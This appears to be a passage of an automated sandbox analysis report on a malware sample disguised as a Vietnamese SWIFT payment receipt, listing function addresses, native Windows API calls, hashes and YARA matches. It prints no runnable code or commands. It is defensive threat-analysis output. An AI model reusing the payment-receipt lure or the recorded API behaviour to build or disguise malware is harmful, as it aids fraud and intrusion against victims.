Instruction ID: 058b906ceb15e5e241c8081437fc8d1c348241c79dd3a6e31077bee245b78af8
Opcode Fuzzy Hash: 3cc26a9a1eb28a63df67051168c03a70900902e37c818e8e49756ba575d114c4
Instruction Fuzzy Hash: B1414872B2432AAFCB11CE18C88217EBBB5FF9D300B4945A7E544CB251D678DA51C792

Function 01223790 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159987302.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8961875a3ad1a713106f13243d1e1b4543ffd0845ef996d189445a2eb05cf12
Instruction ID: 1a25e70c494fcb45c5c494a8bcdcdff99d0abea40bc89d97b5fbe989a3b02182
Opcode Fuzzy Hash: d8961875a3ad1a713106f13243d1e1b4543ffd0845ef996d189445a2eb05cf12
Instruction Fuzzy Hash: FA41AF71F342699FDF04CF68C8869AEBBB5FB8C600B158966D405EB351D678D900CB91

Function 012237A0 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159987302.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc7c2f987b9e2bcf3c5e9f51e9c13b9d181e5a774344016168166883b72113e
Instruction ID: 41b7a70b3e5fdb51fa7ad4ac60e815a5d004e8aa31948b68b66c957f4a1eaf6f
Opcode Fuzzy Hash: 1dc7c2f987b9e2bcf3c5e9f51e9c13b9d181e5a774344016168166883b72113e
Instruction Fuzzy Hash: D8419F71F341699FDF04CFA9C88696EBBF5FB8C600B158926D405EB350D678D900CB91

Analysis Process: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exePID: 1364, Parent PID: 5920COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	2.7%
Signature Coverage:	1.4%
Total number of Nodes:	556
Total number of Limit Nodes:	70

Executed Functions

Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455

Strings

rMA, xrefs: 0041A432, 0041A440
1JA, xrefs: 0041A42C, 0041A438
rMA, xrefs: 0041A44D, 0041A454

Memory Dump Source

Source File: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA$rMA$rMA
API String ID: 2738559852-782607585
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Function 0041A40A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455

Strings

rMA, xrefs: 0041A432, 0041A440
1JA, xrefs: 0041A42C, 0041A438
rMA, xrefs: 0041A44D, 0041A454

Memory Dump Source

Source File: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA$rMA$rMA
API String ID: 2738559852-782607585
Opcode ID: 04ce376e678edcdb9751289a0f82548d436417c29a13e682c939fe5dcdc6d76c
Instruction ID: b0d4b4de7d76c8bf591afcef4104654b5335bd7ab6703c25e51113693fc8203e
Opcode Fuzzy Hash: 04ce376e678edcdb9751289a0f82548d436417c29a13e682c939fe5dcdc6d76c
Instruction Fuzzy Hash: B1F01DB6200149ABCB04DF98D990CEB77ADFF8C314B15864DF95D97201C634E8558BA4

Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62

Memory Dump Source

Source File: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95

Function 0041A35A Relevance: 1.5, APIs: 1, Instructions: 44
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD

Memory Dump Source

Source File: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b7c82dd204dac21fe647372479e01c61b9d40f16f17e88d6db4b886f29bcc5fb
Instruction ID: 159411f34822f584cba13318e380b0e6d4baf2e06112cf03047d7a0e9d554c69
Opcode Fuzzy Hash: b7c82dd204dac21fe647372479e01c61b9d40f16f17e88d6db4b886f29bcc5fb
Instruction Fuzzy Hash: 4401EFB2201208AFCB48CF88CC81EEB37E9AF8C754F158609FA0DD7241D630E8518BA0

Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD

Memory Dump Source

Source File: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579

Memory Dump Source

Source File: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4

Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5

Memory Dump Source

Source File: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0

Function 01222B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01222B6A

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3da52feee8e27060c706228707ce4de3bd75b189bbce596f0a2cf33d675c1603
Instruction ID: d84bad8ac937d6fd2d0a4f01a187b4a3880981e397e600264a43d7d79ab48993
Opcode Fuzzy Hash: 3da52feee8e27060c706228707ce4de3bd75b189bbce596f0a2cf33d675c1603
Instruction Fuzzy Hash: 599002A121240003410571584414616401A97E0201B55C121F2018990DC52589927225

Function 01222BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01222BFA

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f709e64f82e315f880645e29d20015499172328e585c9672bf0d4f695e297ea2
Instruction ID: 78a9261fe0746ca4ae67b7b154ebc9c47c37be2605cc33dfd83c505c031940a0
Opcode Fuzzy Hash: f709e64f82e315f880645e29d20015499172328e585c9672bf0d4f695e297ea2
Instruction Fuzzy Hash: 7790027121140802D1807158440464A001597D1301F95C115B1029A54DCA158B5A77A1

Function 01222AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01222ADA

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 22c2aa0c7ddea27e394c1443c9963015b10dc73a0707c084c9fc6f2d4aa34156
Instruction ID: e776d76651072d20cf7b1115c4d52620a1880ae2ded5a8adcafd7011b0fb33d9
Opcode Fuzzy Hash: 22c2aa0c7ddea27e394c1443c9963015b10dc73a0707c084c9fc6f2d4aa34156
Instruction Fuzzy Hash: 1F900265221400030105B5580704507005697D5351355C121F2019950CD62189626221

Function 01222D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01222D3A

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 920ec38b47111f30a304e6837e0141ac474897012fb1b76be807b0d7b8bc9b29
Instruction ID: acd66314f94dd4af9ebea891577c791e66c3cc6556a7c90b633722ed42adba84
Opcode Fuzzy Hash: 920ec38b47111f30a304e6837e0141ac474897012fb1b76be807b0d7b8bc9b29
Instruction Fuzzy Hash: D990047131140003D140715C541C7074015F7F1301F55D111F141CD54CDD15CD577333

Function 01222D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01222D1A

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bf5af54c236106c331c49dce3c86ab9980e3d194156591b1c578b978e524c6b5
Instruction ID: d09eda16c23978e9cd835aad5fd2ea4e5416e9a20619407c251c2146318d8187
Opcode Fuzzy Hash: bf5af54c236106c331c49dce3c86ab9980e3d194156591b1c578b978e524c6b5
Instruction Fuzzy Hash: 9990026922340002D1807158540860A001597D1202F95D515B1019958CC915896A6321

Function 01222DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01222DFA

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0dd750169ea3f979bf7671a6f9b7c619240d31ad70b7fda550bf5971d924a992
Instruction ID: 93253da92dce6dce58e2d4dcd3dc492bb918f16c6fa7a165dd46ab9271e9b8c5
Opcode Fuzzy Hash: 0dd750169ea3f979bf7671a6f9b7c619240d31ad70b7fda550bf5971d924a992
Instruction Fuzzy Hash: 2290027121140413D11171584504707001997D0241F95C512B1428958DD6568A53B221

Function 01222DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01222DDA

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fc4af25b63763168bb0a88d3816221bb1b2a1bcdff64d7a99ff0eadca9ff30fe
Instruction ID: f2957866d7183936380626302f31658a3b912ab3a026db96d0622093de36732d
Opcode Fuzzy Hash: fc4af25b63763168bb0a88d3816221bb1b2a1bcdff64d7a99ff0eadca9ff30fe
Instruction Fuzzy Hash: B4900261252441525545B15844045074016A7E0241795C112B2418D50CC5269957E721

Function 01222C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01222C7A

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d5ffab98cc802d2e4fbb649cbef4557712cd1a26eb7831af1053922e42d26660
Instruction ID: abf276641aee76f7e5c8d74fcc4f94f552f7d3cd3756eb8c8d785b43640a4791
Opcode Fuzzy Hash: d5ffab98cc802d2e4fbb649cbef4557712cd1a26eb7831af1053922e42d26660
Instruction Fuzzy Hash: A290027121148802D1107158840474A001597D0301F59C511B5428A58DC69589927221

Function 01222CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01222CAA

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3054bbc3be8e2173ceb62e396ab5c6f67e3cd47b9b6816ffebe40d975df5ef55
Instruction ID: 96fd51f28485058ab336d644275345ec9a3943cc987de9a6beb698047f79e8da
Opcode Fuzzy Hash: 3054bbc3be8e2173ceb62e396ab5c6f67e3cd47b9b6816ffebe40d975df5ef55
Instruction Fuzzy Hash: CB90027121140402D10075985408646001597E0301F55D111B6028955EC66589927231

Function 01222F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01222F3A

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9c562c907f47b2196c4f29659fe4323053f067f36ee1eecfb3ca0fc22a996904
Instruction ID: c13dbd3f88e345c5834ec60289170bbe45fc2f771280891aac7c21dc1bc9d173
Opcode Fuzzy Hash: 9c562c907f47b2196c4f29659fe4323053f067f36ee1eecfb3ca0fc22a996904
Instruction Fuzzy Hash: F49002A135140442D10071584414B060015D7E1301F55C115F2068954DC619CD537226

Function 01222FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01222FBA

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 38f5de467d36b84a7fc45fa5030c160184c69a307dc2d5620de701b85db7da93
Instruction ID: 58c823de260943f2d1c351b5950f3fbaf1814974c27147a6c65d1492c462743b
Opcode Fuzzy Hash: 38f5de467d36b84a7fc45fa5030c160184c69a307dc2d5620de701b85db7da93
Instruction Fuzzy Hash: 22900261611400424140716888449064015BBE1211755C221B199C950DC55989666765

Function 01222F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01222F9A

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5a85e823a74bc6caeafdbdf713d94b6af86c555fea18e4488773a1ec9504a1c3
Instruction ID: 79fbe780a30f2bfc5282245897a6a100268994e314de660cc4d84cb54a4d4fdc
Opcode Fuzzy Hash: 5a85e823a74bc6caeafdbdf713d94b6af86c555fea18e4488773a1ec9504a1c3
Instruction Fuzzy Hash: 8090027121180402D1007158481470B001597D0302F55C111B2168955DC62589527671

Function 01222FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01222FEA

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d89cc6ca645d06c7ca3c1c527e3dca8268537638ea6b5b519291569a022b5a19
Instruction ID: d770c0258a3d6b3b619acd36eda5b53a809f605099c9944fe5fb4e9716fb1edf
Opcode Fuzzy Hash: d89cc6ca645d06c7ca3c1c527e3dca8268537638ea6b5b519291569a022b5a19
Instruction Fuzzy Hash: A3900261221C0042D20075684C14B07001597D0303F55C215B1158954CC91589626621

Function 01222EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01222EAA

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c748a1fdad94fd803e08d498fd9dc018d1faf8378043d128aeb7198d0c4902
Instruction ID: 6c5cb2e21f9f708caed211826ab1a0e4c144b25e2dca80123ea3a136663edc3a
Opcode Fuzzy Hash: b6c748a1fdad94fd803e08d498fd9dc018d1faf8378043d128aeb7198d0c4902
Instruction Fuzzy Hash: 319002B121140402D14071584404746001597D0301F55C111B6068954EC6598ED67765

Function 01222E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01222E8A

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 80d3793951fadab18f1e46842e91e1d0fd9869139468fc3defb5e4d64e36120f
Instruction ID: cf923ed9ae6b851c5f69d1f050bdcd7a5f14eb78b1e17017add6cbffd1a62307
Opcode Fuzzy Hash: 80d3793951fadab18f1e46842e91e1d0fd9869139468fc3defb5e4d64e36120f
Instruction Fuzzy Hash: 6590026161140502D10171584404616001A97D0241F95C122B2028955ECA258A93B231

Function 00409AB0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5

Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D

Strings

6EA, xrefs: 0041A652, 0041A65C

Memory Dump Source

Source File: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: 6EA
API String ID: 1279760036-1400015478
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA

Function 0041A7C2 Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800

Memory Dump Source

Source File: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: a496f38d62274ef6293b7414ddfcee86aa1f2983a0e4186dedcc86b2506cb2a9
Instruction ID: d99af1ccc2e3a41905549a2c7186a1e47417f692c9093ccbc51682857587e646
Opcode Fuzzy Hash: a496f38d62274ef6293b7414ddfcee86aa1f2983a0e4186dedcc86b2506cb2a9
Instruction Fuzzy Hash: 3AF049B62001187FDB14DFA9DC84EEB37A9EF88350F108519F91CD7281C631E9518BB4

Function 0041A662 Relevance: 1.5, APIs: 1, Instructions: 25
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D

Memory Dump Source

Source File: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: f328f87049165c24a51f13d9e7a0f1effd32b804806cab775e60eade8b30b86c
Instruction ID: 361753aced8246878da85d9549347fae3a264afc1108e3ae6c6f607104c80fd3
Opcode Fuzzy Hash: f328f87049165c24a51f13d9e7a0f1effd32b804806cab775e60eade8b30b86c
Instruction Fuzzy Hash: 53E068B41042850FD700EE79949049F37D4FF80328724865BEC584B307D024C45B8761

Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

